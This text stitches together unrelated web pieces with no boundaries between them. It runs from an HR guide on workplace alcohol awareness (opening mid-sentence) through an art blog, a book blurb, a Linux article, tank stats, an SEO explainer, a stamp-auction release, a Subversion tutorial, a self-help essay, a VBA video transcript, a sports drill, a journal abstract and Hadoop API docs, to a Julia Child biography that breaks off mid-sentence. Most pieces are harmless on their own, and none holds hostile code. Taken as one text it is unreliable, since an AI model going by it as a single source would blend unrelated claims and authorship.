Provide a key HR contact who can offer online resources and support for managers as needed, as well as send them to courses. - Consider work adjustments. Make line managers aware of how they can provide accommodations for individuals who struggle to get support. For example, flexible working options or role adjustments. - Review working practices. Assess whether your current practices support staff wellbeing and rethink the nature of work socialising to ensure it is inclusive. 4. Invest in accessible mental health support Did you know about 1 in 4 people in the UK will experience a mental health problem each year? The relationship between alcohol and mental health is complex. In fact, alcohol is regarded as ‘the UK’s favourite coping mechanism’, with many drinking to cope with stress, anxiety, depression or other mental health problems. Some call this ‘self-medicating’ with alcohol. While alcohol can initially relax us and give us a feeling of euphoria, these feelings are short-lived, and the long-term effects of drinking over a prolonged period can be quite harmful: - Drinking too much alcohol can worsen symptoms of many mental health problems. In particular, it can lead to low mood and anxiety. - When the immediate calm after drinking fades, some may feel worse than before. - Post-drinking hangovers can be especially difficult, causing headaches, nausea, and depression. - Using alcohol in this way can mean that the underlying mental health problems go unaddressed. Considering this, you should ensure your employee is aware of the top three methods for preventing alcohol problems: - Employee assistance programme - Access to occupational health programme - Access to/signposting to mental health support If none are available, you may want to refer your employee to a doctor for assessment. An online GP service like HealthHero’s provides fast and convenient access to practising doctors who can provide direct support and advice to your employees. 
Additionally, we offer online clinically proven counselling and psychological interventions.

5. Don’t encourage a drinking culture

How many of your work social events take place at pubs or bars? 43 percent of working adults agree that there is too much pressure to drink when socialising with colleagues. In fact, those in the private sector are 3.6 times more likely to feel pressured by their managers. There is no doubt that certain aspects of company culture can influence perceptions about alcohol consumption. So, you should adjust these aspects to reflect the company culture you want to create and ensure they are evident in your policies. According to the CIPD, 25 percent of employees say that some people don’t go to social events because of the expectation to drink alcohol. Thus, hosting drink-free events for employees to connect goes beyond being merely practical. As well as reducing the tendency to meet over a drink, it can align with diversity strategies. For instance, HR could aim to arrange a monthly alcohol-free event, not just for employee wellbeing but also to respect employees' cultural choices and preferences. A few suggestions include:

- Moving client meetings away from drinking and ‘happy hour’ to ‘networking’.
- Offering non-alcoholic options and limiting the amount of alcohol your company provides.
- Organising social events without alcohol (this may deter staff from attending, so promote the events to avoid the company culture revolving around alcohol).

6. Make support a priority in your policies

Go beyond simply improving alcohol education in the workplace. Do your policies prioritise workplace support? Employees will appreciate the fact that your company is supportive of them. To ensure an effective policy, focus on the following key areas to address alcohol misuse:

- Holistic culture: Promote a workplace culture that values holistic employee health and wellbeing through the support outlined earlier.
- Preventative services: Ensure that all preventative measures are covered by your health and benefits plan.
- Alcohol awareness programme: To reduce the impact of alcohol-related harm, develop a robust alcohol awareness workplace programme. This could include:
  - Precise written policies and procedures that define employee and employer responsibilities.
  - Education and resources for employees and managers.
  - Employee benefits such as healthcare coverage, employee assistance and flexible sick time.
  - Support to reintegrate employees during recovery.

7. Host a practical workshop

As we’ve established, many people don’t realise the harmful effects of alcohol on their health and wellbeing. Hosting alcohol-aware workshops, such as sessions on everything employees need to know, can:

- Promote alcohol awareness
- Facilitate a responsible culture
- Build healthy coping strategies

On top of this, expert-led workshops can also positively impact your business. Improving the coping strategies of your employees leads to:

- Fewer sick days and reduced staff turnover
- Increased employee productivity
- A happier and healthier workforce

As mentioned earlier, there are training sessions available. Which workshops you host will depend on your size and budget. That said, make sure any workshop you choose acknowledges the importance of the body and mind. After all, it’s not just decreasing alcohol intake and tracking units that can reduce health risks. Exercise, eating well, and getting plenty of sleep are also essential.

8. Signpost to helpful resources

If you are concerned that an employee has a drinking problem, external help is available. They can find some useful phone numbers and links here for free and confidential advice. Drinkaware is a charity which aims to reduce alcohol-related harm by helping people make better choices. Helpline: 0300 123 1110. Free online chat service for anyone who is looking for information or advice about their own, or someone else’s, drinking.
Drinkaware trained advisors are on hand to give you confidential advice. UK-wide treatment agency, helping individuals, families and communities to manage the effects of drug and alcohol misuse. If you are over 50 and have concerns about your drinking, call the helpline. Helpline: 0808 801 0750 AA supports the recovery and continued sobriety of individuals. Meetings are available online and in person. Helpline: 0800 917 7650 Al-Anon in the UK and Republic of Ireland offers support to families and friends affected by someone else’s drinking. Helpline: 0800 008 6811 Information, advice and local support services for families affected by alcohol and drugs. Helpline: 07442 137 421 or 07552 986 887. Alcohol awareness: it’s time to act now ‘It’s more important than ever for organisations to be aware of alcohol misuse and to signpost their staff to appropriate support. Organisations are in a strong position to engage with their staff about alcohol awareness, and now is the time to prioritise employee health and wellbeing.’ – Drinkaware You can use alcohol awareness as an opportunity to review your substance misuse policies, evaluate your wellness strategy, and support your employees. Nonetheless, with workplace pressures contributing to increased alcohol consumption, your business must do more. Without effective preventative measures, your employees’ wellbeing, physical health, and productivity will suffer. Start small by educating employees on the signs of alcohol dependence through e-learning. Then introduce a comprehensive substance abuse prevention programme to bring about real, tangible change. Alternatively, you might consider investing in a virtual healthcare service that combines physical health with mental health. Whatever action you take, put your workers’ health first. Are you looking to educate your employees about the impact of alcohol? Do you want to support those harmed by it? 
Learn how to raise awareness and explore the link with mental health by joining Drinkaware experts in our webinar where you’ll learn how to provide support and expert resources.
Welcome to corvusfugit.com! Corvus fugit means "the crow flies."

Tag Archives: Latino/as/x

Kcho: Obras Escogidas (Selected Works) (1994) (source) For their 2009 piece Do You Remember When?, the indigenous arts collective Postcommodity cut through the floor of the Arizona State University Art Museum, exposing the earth below. A recording of a Pee Posh social dance song played in the … Continue reading

Leonardo da Vinci: Lady with an Ermine [Cecilia Gallerani] (1489–1490) Awol Erizku: Lady with a Pitbull (2009) Hans Holbein: Portrait of a Lady with a Squirrel and a Starling [probably Anne Lovell] (c. 1526-28) Frida Kahlo: Self-Portrait with … Continue reading

Max Yavno: East Los Angeles, 1946 (source) “Helen Martinez and her children (her grandchild was too young to picket) wear placards announcing that Tex-Son workers are on strike.” (source) Klimbin (colorizer): Emiliano Zapata (source) Butch Locsin aka The Skeleton of Color Gallery here.
The first systematic study of the Aristotelian theory of anagnorisis in 16c Spanish drama. Anagnorisis - `recognition' or `discovery' - is a key element of Aristotelian literary theory. This book is the first systematic study of its presence in Spanish drama of the sixteenth century, a period in which Aristotelian theory was widely disseminated. Professor Garrido begins by examining the theory of anagnorisis developed by Aristotle and his sixteenth-century commentators. She then analyses its use in a large corpus of Spanish plays from the period 1515-87. Her survey is divided into two parts, corresponding to the years before and after the appearance, in 1548, of Robortello's commentary, which expanded and developed Aristotle's definition of anagnorisis. In earlier decades its use is largely confined to humanistic plays, which seek to allow the recognition to arise naturally from the plot; plays from the second half of the century tend to model their use of anagnorisis on Plautus's Menaechmi and regularly resort to a deus ex machina to bring about the recognition. PATRICIA GARRIDO CAMACHO is Professor of Spanish at the University of Montana.

"...Garrido's study aligns itself with the vindication of anagnorisis not only because it reads the dramas in accordance with poetic theories. It is also a panoramic view of sixteenth-century theatre that allows us to enjoy our own shock at recognizing the great contribution of anagnorisis." IBEROAMERICANA, I, 4 (2001)
12 Unexpected Things That Exist Because Of Linux Published 8:06 am, Saturday, July 13, 2013 It feels like Linux doesn't get enough love. Apple's OS X and Microsoft's Windows operating systems are always in the spotlight, but the free and open-source Linux quietly churns away to power a surprising number of everyday or unusual items. Jim Zemlin, executive director of the Linux Foundation, told us, "You use Linux every day but you don't know it. It's such a fundamental part of our lives. "It runs air traffic control, it runs your bank, and it runs nuclear submarines. Your life, money, and death is in Linux's hands, so we can keep you alive, clean you out, or kill you. It's incredible how important it is. "The world without Linux might be a very different place. It's one where computing is kind of crappy and homogeneous. You're still using Windows CE on your crappy Windows cell phone. That world is grim and dark and Linux is a reason why that world doesn't exist." We've gathered 12 examples that prove Zemlin's statements are no exaggeration – for such an oft-forgotten operating system, you rely on Linux far more than you realize. Android phones and tablets got their start in Linux. The hugely popular mobile operating system uses Linux as its foundation, and with hundreds of thousands of Android devices activated each day, it keeps Linux relevant. Your TiVo is powered by Linux! Linux powers a majority of the world's supercomputers. See the rest of the story at Business Insider
Comparing: M4A2E4 Sherman vs. Matilda IV vs. Type 3 Chi-Nu

Work on this experimental vehicle started in March 1943. Two prototypes were built by July. The vehicle passed trials, but was never mass-produced or used in action.

A British tank supplied to the U.S.S.R. under Lend-Lease. A total of 1,084 vehicles were sent to the Soviet Union, with some lost at sea during transport to Murmansk.

The Type 3 Chi-Nu medium tank is a modification of the Type 1 Chi-He with a new turret and gun. The tank was the most powerful among wartime Japanese mass-produced vehicles. However, only 60 vehicles were manufactured due to shortages of components and materials.

| Attribute | M4A2E4 Sherman | Matilda IV | Type 3 Chi-Nu |
|---|---|---|---|
| Battle Tiers | 5-6 | 5-6 | 5-7 |
| Speed Limit | 52 km/h | 25 km/h | 38.8 km/h |
| Speed Limit Back | 18 km/h | 10 km/h | 16 km/h |
| Horse power / weight | | | |
| Max Climb Angle | | | |
| Hard terrain resistance | | | |
| Medium terrain resistance | | | |
| Soft terrain resistance | | | |
| Damage (Explosion radius) | | | |
| Damage / min | | | |
| Rate of Fire | | | |
| Stationary | 12.50 % | 15.00 % | |
| In motion | 10.00 % | 10.00 % | |
| When Firing | 3.25 % | 3.88 % | |
| Accuracy | 61.2672 % | 66.7624 % | |
| Net Credits Income | 5072.19 | 6022.26 | |
| Winrate | 54.1623 % | 54.7138 % | |
| Kills per Battle | 0.831915 | 0.916629 | |
A search algorithm is a unique formula that a search engine uses to retrieve specific information stored within a data structure and determine the significance of a web page and its content. Search algorithms are unique to their search engine and determine search engine result rankings of web pages.

Common Types of Search Algorithms

Search engines use specific algorithms based on their data size and structure to produce a return value.

Linear Search Algorithm

Linear search algorithms are considered to be the most basic of all search algorithms, as they require a minimal amount of code to implement. Also known as a sequential search, the linear search is the simplest search algorithm to use. Linear search algorithms are best for short lists that are unordered and unsorted. To find what is being searched for, the algorithm looks at the items as a list. Once it reaches the item being searched for, the search is finished. Linear search is not a common way to search, as it is a fairly inefficient algorithm compared to other available search algorithms.

Simple Example of Linear Search Algorithm: Let’s say that you are meeting your friend, Stephanie, tonight at the movies for a new movie premiere. She offers to get your ticket and wait in line for the theatre to grab good seats. Once you arrive at the theater, you notice the line is long and you have no idea where your friend is in the line. However, you know what Stephanie looks like, so on your way in you start at the end of the line and scan each person's face looking for your friend. Once you find her, you get in line next to her. You just followed a linear search algorithm. The line is long and the people are unordered, so the best way to find who you’re looking for is to scan the line from one end to the other.

Binary Search Algorithm

A binary search algorithm, unlike linear search algorithms, exploits the ordering of a list.
This algorithm is the best choice when a list has terms occurring in order of increasing size. The algorithm starts in the middle of the list. If the target is lower than the middle point, it eliminates the upper half of the list; if the target is higher than the middle point, it cuts out the lower half of the list. For larger databases, binary search algorithms will produce much faster results than linear search algorithms. Binary search algorithms are made up of three main sections that determine which half of the list to eliminate and how to scan through the remainder:

- Pre-processing sorts the collection if it is not already in order.
- Searching uses a loop or recursion to divide the search space in half after making a comparison.
- Post-processing determines which viable candidates remain in the search space.

Simple Example of Binary Search Algorithm: You are searching for your favorite blue sweater in your walk-in closet. You’ve color-coordinated your clothing from right to left based on the standard ROYGBIV color order. You open the door and go straight to the middle of your closet, where your green clothing is located, and automatically you’ve eliminated the first half of options, since they are not close to the colors that you are looking for. Once you’ve eliminated half of your options, you realize your selection of blue clothing is large and makes up the majority of the second half of clothing options, so you go to the middle of the blue/indigo section. You can eliminate the indigo and violet colors. From there, all you have left is green and blue, and you’re able to select your favorite blue sweater from the remainder of clothing. By eliminating your clothing options in halves, you are able to cut your search time in half and narrow in on your favorite blue sweater.
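Both search strategies described above fit in a few lines of code. Here is a minimal sketch in Python; the example lists and values are invented for illustration:

```python
def linear_search(items, target):
    """Sequential search: scan the list from one end to the
    other and stop as soon as the target is found."""
    for index, item in enumerate(items):
        if item == target:
            return index
    return -1  # reached the end without a match


def binary_search(sorted_items, target):
    """Binary search: start in the middle of a *sorted* list and
    discard half of the remaining candidates on every comparison."""
    low, high = 0, len(sorted_items) - 1
    while low <= high:
        mid = (low + high) // 2
        if sorted_items[mid] == target:
            return mid
        elif sorted_items[mid] < target:
            low = mid + 1    # target is higher: drop the lower half
        else:
            high = mid - 1   # target is lower: drop the upper half
    return -1


# Unordered movie line: linear search is the right tool.
line = ["Alex", "Priya", "Stephanie", "Marcus"]
print(linear_search(line, "Stephanie"))   # -> 2

# Ordered list: binary search finds the target in a few halvings.
values = [2, 5, 8, 12, 16, 23, 38, 56, 72, 91]
print(binary_search(values, 23))          # -> 5
print(binary_search(values, 40))          # -> -1
```

A linear scan may inspect every item, while binary search never needs more than about log2(n) comparisons: at most four looks on a ten-item list, and roughly twenty on a million items.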
How Search Algorithms Impact Search Engine Optimization

Search algorithms help determine the ranking of a web page at the end of the search when the results are listed. Each search engine uses a specific set of rules to help determine if a web page is real or spam and if the content and data within the page are going to be of interest to the user. The results of this process ultimately determine a site’s ranking on the search engine results page. While each set of rules and algorithm formulas varies, search engines use relevancy, individual factors and off-page factors to determine page ranking in search results.

Search engines search through web page content and text looking for keywords and their location on the website. If keywords are found in the title of the page, the headline and the first couple of sentences on a page of a site, then that page will rank better for that keyword than other sites. Search engines can scan to see how keywords are used in the text of a page and will determine if the page is relevant to what you’re searching for. The frequency of the keywords you’re searching for will affect the relevancy of a site. If keywords are stuffed into a site’s text and the text doesn’t flow naturally, search engines will flag this as keyword stuffing. Keyword stuffing reduces a site’s relevancy and hurts the page’s ranking in search engine results.

Since search algorithms are specific to search engines, individual factors come from each search engine’s ability to use its own set of rules for search algorithm application. Search engines have different sets of rules for how they search and crawl through sites, for adding a penalty to sites for keyword spamming, and for how many sites they index. As a result, if you search for “home decor” on Google and then again on Bing, you will see two different pages of results. Google indexes more pages than Bing - and more frequently - and, as a result, will show a different set of results for search inquiries.
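As a toy illustration of the keyword-frequency idea above: a crude check might compare how often one keyword appears against the total word count and flag pages that exceed some share. This is not any real engine's algorithm; the function names, threshold and sample texts are all invented for the example:

```python
def keyword_density(text, keyword):
    """Fraction of words in the text that exactly match the keyword."""
    words = text.lower().split()
    if not words:
        return 0.0
    return words.count(keyword.lower()) / len(words)


def looks_stuffed(text, keyword, threshold=0.2):
    """Flag text where a single keyword exceeds an arbitrary share
    of all words -- a crude stand-in for a stuffing check."""
    return keyword_density(text, keyword) > threshold


natural = "Our guide to home decor covers lighting, rugs and wall art."
stuffed = "decor decor decor best decor cheap decor buy decor decor"

print(looks_stuffed(natural, "decor"))  # -> False
print(looks_stuffed(stuffed, "decor"))  # -> True
```

A real engine would weight keyword placement (title, headline, opening sentences) and natural flow, not just a raw count, but the density idea is the same.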
Off-page factors that help search engines determine a page’s rank include things like hyperlinking and click-through measurement. Click-through measurements can help a search engine determine how many people are visiting a site, if they immediately bounce off the site, how long they spend on a site and what they search for. Poor off-page factors can lower a site’s relevancy and SEO ranking, so it’s important to consider these items and work to improve them if necessary. Once you have a better understanding of how search algorithms work and their role in search engine optimization and site rankings, you can make the necessary adjustments to a site to improve its ranking. At Volusion, our team of Search Engine Optimization (SEO) specialists can help you make adjustments and set up your site so that it is properly optimized for search engines. Contact us today and let us help you get started on your site's SEO! Ready to take your ecommerce SEO to the next level? Learn how Volusion can help you increase traffic and sales for your store!
Cherrystone Auctions Introduces Online Gallery Of Rarities Interested website visitors can view pictures and details of the auctioneer’s rarest stamps Cherrystone Auctions has opened a “Gallery of Rarities” section of their website where stamp enthusiasts can view information about the rarest and most valuable stamps sold by the New York City auction house. The gallery includes nearly 400 rare stamps sold through Cherrystone over the years. Visitors to the Gallery of Rarities are able to click on a specific stamp and view an enlarged image. Detailed information accompanies each stamp in the gallery, including the year it was released, the year it was sold and the price it realized at auction. Users of the interactive gallery are able to sort through the collection of rare stamps from around the world by country of origin or by price realized. The Gallery of Rarities includes stamps and stamp-related collectibles from the United States, Russia, Canada, China, Italy, Iceland and other countries. Sorting the stamps by the price they realized at auction reveals that the highest-priced item in the Gallery is a complete pane of 25 Russian stamps released in 1924 and sold in a Cherrystone auction in June of 2008 for $805,000.00. The highest-priced American stamp in the Gallery—a 24-cent stamp from 1918—was auctioned off by Cherrystone in December of 2010 for $345,000.00. Cherrystone notes on their website that there may be many stamps that look similar to those in their Gallery of Rarities. Oftentimes, the auction house explains, the very subtle differences between rare stamps and common stamps can be determined only by experts. Cherrystone Auctions’ Gallery of Rarities, https://www.cherrystoneauctions.com/gallery.asp, is found on their website, listed below, under the “About” section at the top of the page. Cherrystone Auctions was originally founded as a retail store in 1967.
Since then, it has evolved over 49 years into one of the world’s leading auctioneers of rare stamps and philatelic material. Located in the heart of New York City, Cherrystone is a member of all major United States and European philatelic societies, among them the ASDA, the APS, the U.S. Philatelic Classics Society and the Collectors Club of New York. The auction house brings over $30 million worth of stamps and postal-related collectibles to market each year. Its auctions, held several times per year, feature stamps from around the world of particular rarity and quality. In addition to regular auctions, Cherrystone occasionally holds “Specialty” sales, often the award-winning collections of single owners. Among the famous collections auctioned off by Cherrystone were the Garfield Collection of United States Postal Stationery, the Andrew Cronin Collection of Worldwide Postal History and the S. Shtern Collection of the Soviet Union.

Cherrystone’s leadership staff includes Paul Buchsbayew as President and Joshua Buchsbayew as Vice President. The leaders credit the auction house’s success to a combination of decades of experience in the business and a personal passion for stamps. Paul is a member of the A.I.E.P. (Association Internationale des Experts en Philatélie) and an expert in Russian material, while Joshua’s primary interest is in United States Classics. Parties interested in selling their collections through Cherrystone, or who have questions about how to purchase from the auction house, are encouraged to contact Paul or Joshua directly. More information about Cherrystone Auctions and its upcoming auction on August 9th and 10th is available on their website.

Cherrystone Auctions, Inc.
Address: 119 West 57th Street, Suite 316, New York, NY 10019
Toll Free: 800.886.9313
Bids Email: email@example.com
When setting up Subversion within an organization, folks will often ask “How many repositories should I create?”—my advice is to just create one repository until you have a concrete need for more. I take this approach because it’s easy to split an existing repository into two. I also remind people it’s not the end of the world if they create multiple repositories and then need to merge them, because Subversion has good support for splitting, merging, and reorganizing repositories. I’ve never really gone into any detail on how you actually do this stuff, but since I recently needed to merge two repositories I thought I’d share the technique I used.

Splitting a repository

First off, make sure you tell everyone you’re going to split the repository. The ideal situation is where everyone can check in, go home for the night, leave you to organize stuff, and then come in the next day and start on something fresh. If people can’t commit all their changes you may need to help them relocate their working copy. Once everyone’s committed their changes, close down network access to your repository to be sure no-one’s committing further changes. This might be overkill depending on your situation, but it’s nice to be safe. Next, back up your repository using svnadmin dump to create a dump file. A dump file is a portable representation of a Subversion repository and something you might be using for backups already. We’re going to load the dump file into a new repository, using svndumpfilter to select just the directories we wish to move to the new repository. A typical transcript might look like this:

[mgm@penguin temp]$ svnadmin dump /home/svnroot/log4rss > log4rss.dump
* Dumped revision 0.
* Dumped revision 1.
: : :
* Dumped revision 37.
* Dumped revision 38.
[mgm@penguin temp]$ mkdir tools-repos
[mgm@penguin temp]$ svnadmin create tools-repos
[mgm@penguin temp]$ cat log4rss.dump | svndumpfilter include log4rss/trunk/tools | svnadmin load tools-repos
Including prefixes:
'/log4rss/trunk/tools'
Revision 0 committed as 0.
Revision 1 committed as 1.
Revision 2 committed as 2.
: : :
<<< Started new transaction, based on original revision 38
------- Committed revision 38 >>>

In the above sample, I dumped the Log4rss repository into a file called log4rss.dump and created a new directory called tools-repos initialized with an empty repository. Then I piped my dump file through svndumpfilter and told it to include just the tools directory, and piped the result of the filter into svnadmin load into the new repository. I haven’t included it here, but I got a bunch of information about which items were included in the filter and which were dropped. Now the new tools-repos repository contains just the tools directory. At this point, I can make the new repository available and tell developers where to find it. It’s probably also wise to delete the log4rss/trunk/tools directory from the original repository, just so people can’t accidentally use the old stuff. Subversion doesn’t have an obliterate command so the tools directory is still using space in the old repository—if this is an issue you’ll need to consider loading your dump file into a new repository using an “exclude” command to weed out the directory you no longer want.

Merging two repositories

My current project recently moved from Chicago to Calgary. For a while we had two teams running, using separate Subversion repositories. When everything moved to Calgary, we needed to merge the Chicago team’s code into our repository. We didn’t want to just import the files, we wanted to include historical information too. We created a dump file of the Chicago team’s repository and loaded it straight into our repository using svnadmin load.
This worked because the load command simply replays a series of commits, simulating what would have happened if the Chicago team had been working with us all along. The key thing to note here is that we had been using different directory paths in the two repositories, so their stuff didn’t conflict with ours. If they had used the same directory structure we would not have been able to simply load their changes into our repository. In that case, we would have had to work some magic with the dump file—it contains plain-text path definitions, so in a pinch we could have munged those path names so they didn’t conflict.

Organizing a repository

Once we’d loaded the Chicago code into our repository we used TortoiseSVN’s graphical repository browser to move the new stuff into our existing directory tree. Here’s a screenshot of the repo browser—it’s a great tool for this kind of thing and made reorganization very simple. We just used the “rename” command to move everything around in the repository, and once done we all checked out the newly organized directory tree and continued working.
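Since dump files really are plain text, the path munging mentioned above can be scripted. Here's a minimal sketch of the idea; the `prefix_paths` helper and the `chicago` prefix are illustrative, not part of the workflow we actually used:

```python
import re

def prefix_paths(dump_text, prefix):
    """Prepend `prefix` to every path recorded in a Subversion dump stream.

    Dump streams store paths in plain-text headers such as `Node-path:` and
    `Node-copyfrom-path:`, so a line-wise rewrite is enough for a simple
    relocation. Binary content blocks are passed through untouched.
    """
    out = []
    for line in dump_text.splitlines(keepends=True):
        m = re.match(r"(Node-path: |Node-copyfrom-path: )(.+)", line)
        if m:
            # Rebuild the header with the new prefix in front of the old path.
            line = f"{m.group(1)}{prefix}/{m.group(2).rstrip()}\n"
        out.append(line)
    return "".join(out)
```

You'd run the original dump through this before `svnadmin load`, so the Chicago tree lands under its own top-level directory instead of colliding with yours.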
When we were little kids, we got a lot of different commands from our parents. “Baby steps,” as they called it. We were told to “Walk!” while they supported our hips, to “Close-open!” our hands, and to play “Peek-a-boo!” by putting our hands over our eyes and then removing them, as though trying to scare them, only to end up looking like a cute little monster. Our parents, of course, made all the decisions for us then. It was their decision whether we would eat breakfast, whether we would take a bath, or whether we would go to school. Basically, we grew up having to follow our parents’ orders in order to grow, step by step.

But we are not always kids. We eventually grow up and our thinking skills develop. It is then that we become aware of the many forces around us that may or may not affect the decisions we make for ourselves. As we grow older, it becomes harder and harder to make decisions because of the many possible choices laid out in front of us. There are people who still depend heavily on their parents’ decisions, and there are some who have become mature enough to make decisions for themselves. Not everyone enjoys making decisions when, in fact, each and every one of us has to make them in order to live a life free of regrets. So how do we find our own voice? Fortunately, there are two easy steps we can follow:

1. Check if you are hearing yourself clearly. In order to make decisions for yourself, you have to make sure that you are hearing what your intuition is saying. Hearing, after all, is a prerequisite to listening. And listening to yourself, let alone hearing yourself, is very important when you are making decisions. Sure, the people around you will always have something to say about whatever you are thinking or going through, but never allow your own reasoning to be buried by theirs.

2. Listen to theirs, but follow only yours. Hearing other people’s comments is just about inevitable. In every decision-making situation, they will be there whether you like it or not. You can opt to listen to them, but make sure that at the end of the day, your own decision is still the one that weighs more.

Hearing and listening to yourself do not just help you know your decisions; they also assist you in actually making them—from the pettiest (“What pair of shoes will I wear today?”) to the life-changing (“What career path should I take?”). That is how crucial it is to know how to hear and listen to your own intuition. Always remember that you can listen to what others are saying, but never forget to follow what your heart desires.
Join Curt Frye for an in-depth discussion in this video, Running the simulation with added station capacity, part of Process Modeling in Excel Using VBA.

- [Voiceover] In the previous movie, we added code to our simulation to allow individual stations to handle multiple customers at a time. We indicated the number of customers that a particular station could handle by adding the capacity property and also indicating the capacities here. And we used VBA code to read those values into the properties. The idea is to see how increasing capacity at the two stations with the largest average processing time would affect idle time within the simulation. I've set the mean to 15, so in other words, on average, we would expect a customer to arrive every 15 ticks of the clock. Now we can see how those values will change based on our simulation. With that background in place, I'll press Alt + F11 to move to the Visual Basic Editor. I'm in Module 2, which has a subroutine called Additional Capacity, and what I want to do is run it to see what the idle time looks like within the system. This is the code we created last time, so I'll just go ahead and press F5. The simulation runs, and I'll press Alt + F11 to go back to the workbook. I am now on the results worksheet, and if I scroll down I can see that I have very low idle times. I have a one and a nine, a ten, here I have a 20 and a 24, and 14s and so on, but a lot of zeros and other small values. So it's very encouraging. It tells me that the idle times are going down and, of course, the percentage of time that a customer spends within the process is going down as well. But now let's see how sensitive these results are to changing the mean time. So I'll delete my current results: I'll go to the name box and type A2, then a colon, and then F (F is the idle-time column), and I'll just delete down to 300, even though I know I didn't have 300 customers. When I pressed Enter, those cells were selected. I'll press Delete, and Ctrl + Home to release the selection and go back to cell A1. Then I'll go back to the sim setup worksheet, click inside cell J2, and edit that value to 10. So I now have a mean arrival time of 10, and if I scroll down my list of lookup values I can see that I get a one at 35. So the largest arrival gap I could possibly get between customers is 35 ticks of the clock, but that is extremely unlikely to happen, as you can see from the probabilities here. So I'll go ahead and scroll back up. There's our mean, and now I can press Alt + F11 to go to the Visual Basic Editor. The cursor is still in the subroutine, so I'll press F5. Because we're adding more customers, the simulation takes a little longer to run. Not too bad, though. Then I'll press Alt + F11, and here we are on the results sheet. You can see already that the idle times are significantly higher: our customers are entering the system at smaller intervals than before, and as I scroll down, I can see that the idle times, instead of being a bunch of zeros, now include quite a few in the 20s and 30s. So, scrolling back up, you can see that, as you expected, lowering the mean arrival time will certainly increase the strain on the system, leaving people standing around and more idle time overall.

- Creating a class module in VBA
- Defining class properties
- Creating collections
- Describing process flow and programming goals
- Creating loops
- Increasing capacity of a model
- Running simulations
- Analyzing simulation results
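The sensitivity effect the video demonstrates can be sanity-checked outside Excel. The workbook draws arrival gaps from a lookup table; this sketch substitutes an exponential draw with the same means (15 vs. 10 ticks), purely for illustration:

```python
import random

def simulate_arrivals(mean_gap, n_customers, seed=42):
    """Return the total span of clock ticks over which n_customers arrive,
    drawing interarrival gaps from an exponential distribution with the
    given mean. (The workbook uses a lookup-table distribution instead;
    the exponential is a stand-in for illustration.)"""
    rng = random.Random(seed)
    return sum(rng.expovariate(1.0 / mean_gap) for _ in range(n_customers))

# The same 200 customers arrive over a much shorter span when the mean
# gap drops from 15 ticks to 10, so each station sees more overlapping
# work — which is why the recorded idle times climb.
span_at_15 = simulate_arrivals(15, 200)
span_at_10 = simulate_arrivals(10, 200)
```

With a fixed seed the two runs draw the same underlying randomness, so the comparison isolates the effect of the mean alone.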
Numbers: Max 12 per grid
Equipment: Cones, tag belts

- In a 20m x 30m grid (diagram not to scale), nominate 2 catchers to work as a pair (holding hands)
- Remaining players attempt to run to the opposite side of the grid without being tagged
- If players are successfully tagged, they join hands with the catchers; the chain will become longer as more people are caught. However, the coach may decide that chains may contain a maximum of 5 players, and more than one chain may be working at the same time
- Defensive chain(s) are to work as a team and catch the remaining runners
- Run the activity for 2 mins and rotate catchers
- Defenders to identify free runners
- Scan - heads up
- Communicate
- Increase the catchers' chain to gain more success

Variation / Progression: Change the size of the grid
The influence of improvisation activities on speaking confidence of EFL student teachers
Peer-reviewed journal article
Original version: Nordisk tidsskrift for utdanning og praksis, 2020, 14(2), 82-102. 10.23865/up.v14.1879

The purpose of the present study was to explore the application of improvisation activities in English teacher education, specifically to investigate their influence on the student teachers’ confidence when speaking English spontaneously. The improvisation activities consisted of storytelling, conversations and status expressions. Data were drawn from both pre- and post-questionnaires and retrospective texts. The statistical findings showed significant improvements in the student teachers’ level of speaking confidence and degree of relaxation while speaking English. The findings of the qualitative analysis confirmed this, and participants stated that the fun, collaboration and high degree of engagement had helped to increase their speaking confidence. The combination of the findings indicated that the improvisation activities had been a valuable method for increasing the speaking confidence of the EFL student teachers. The pedagogical implication is that teacher educators should consider including improvisation activities in their EFL courses.
@InterfaceAudience.Public
@InterfaceStability.Stable
public interface Partitioner<K2,V2> extends JobConfigurable

Partitioner controls the partitioning of the keys of the intermediate map-outputs. The key (or a subset of the key) is used to derive the partition, typically by a hash function. The total number of partitions is the same as the number of reduce tasks for the job. Hence this controls which of the m reduce tasks the intermediate key (and hence the record) is sent to for reduction.

Method:
int getPartition(K2 key, V2 value, int numPartitions)
Get the partition number for a given key (and hence record) given the total number of partitions, i.e. the number of reduce tasks for the job. Typically a hash function on all or a subset of the key.
Parameters:
key - the key to be partitioned.
value - the entry value.
numPartitions - the total number of partitions.

Copyright © 2016 Apache Software Foundation. All rights reserved.
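For illustration, the contract is easy to mirror outside Hadoop. Hadoop's default HashPartitioner computes `(key.hashCode() & Integer.MAX_VALUE) % numPartitions`; this sketch uses Python's built-in `hash` as a stand-in for `hashCode`:

```python
def get_partition(key, num_partitions):
    """Sketch of the default hash-based scheme: mask off the sign bit so the
    result is non-negative, then take the hash modulo the number of reduce
    tasks. Every record sharing a key lands in the same partition, and thus
    is processed by the same reducer."""
    return (hash(key) & 0x7FFFFFFF) % num_partitions

# Route some hypothetical (key, value) records to 4 reduce tasks.
records = [("alaska", 1), ("texas", 2), ("alaska", 3)]
partitions = {}
for key, value in records:
    partitions.setdefault(get_partition(key, 4), []).append((key, value))
```

Note that the mask keeps the result in `[0, num_partitions)` even when the hash is negative, which is why the Java original ANDs with `Integer.MAX_VALUE` rather than using plain modulo.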
By filmmaker Marilyn Mellowes, director of American Masters: Julia Child! America’s Favorite Chef. Scooping up a potato pancake, patting chickens, coaxing a reluctant soufflé, or rescuing a curdled sauce, Julia Child was never afraid of making mistakes. “Remember, if you are alone in the kitchen, who is going to see you?” she reassured her television audience. Catapulted to fame as the host of the series The French Chef, Julia was an unlikely star. Over 6′ 2″, middle-aged and not conventionally pretty, Julia had a voice that careened effortlessly over an octave and could make an aspic shimmy. She was prone to say things like “Hooray” and “Yum, yum.” Her early culinary attempts had been near disasters, but once she learned to cook, her passion for cooking and her devotion to teaching brought her into the hearts of millions and ultimately made her an American icon. To the fans who knew and loved her, she was known simply as Joooolia. Born in 1912 in Pasadena, California, she led a life of ease and privilege. She graduated from Smith College with vague aspirations of becoming a writer, but never found a focus. She confided in her diary: “I am sadly an ordinary person… with talents I do not use.” Yet she continued to yearn for adventure and the chance to escape from her comfortable upper-middle-class existence. She found that chance in the aftermath of Pearl Harbor. Like many Americans her age, she hurried to Washington to work for the war effort, finding a job at the Office of Strategic Services (OSS). Eventually she volunteered to go to the Near East. In March 1944, she set sail for Ceylon, now Sri Lanka, to work for the OSS office in the ancient city of Kandy. Here, far from home, she finally had her chance for adventure – and for love. But it was not love at first sight. Ten years older than Julia, Paul Child was an artist, a poet who had earned a black belt in 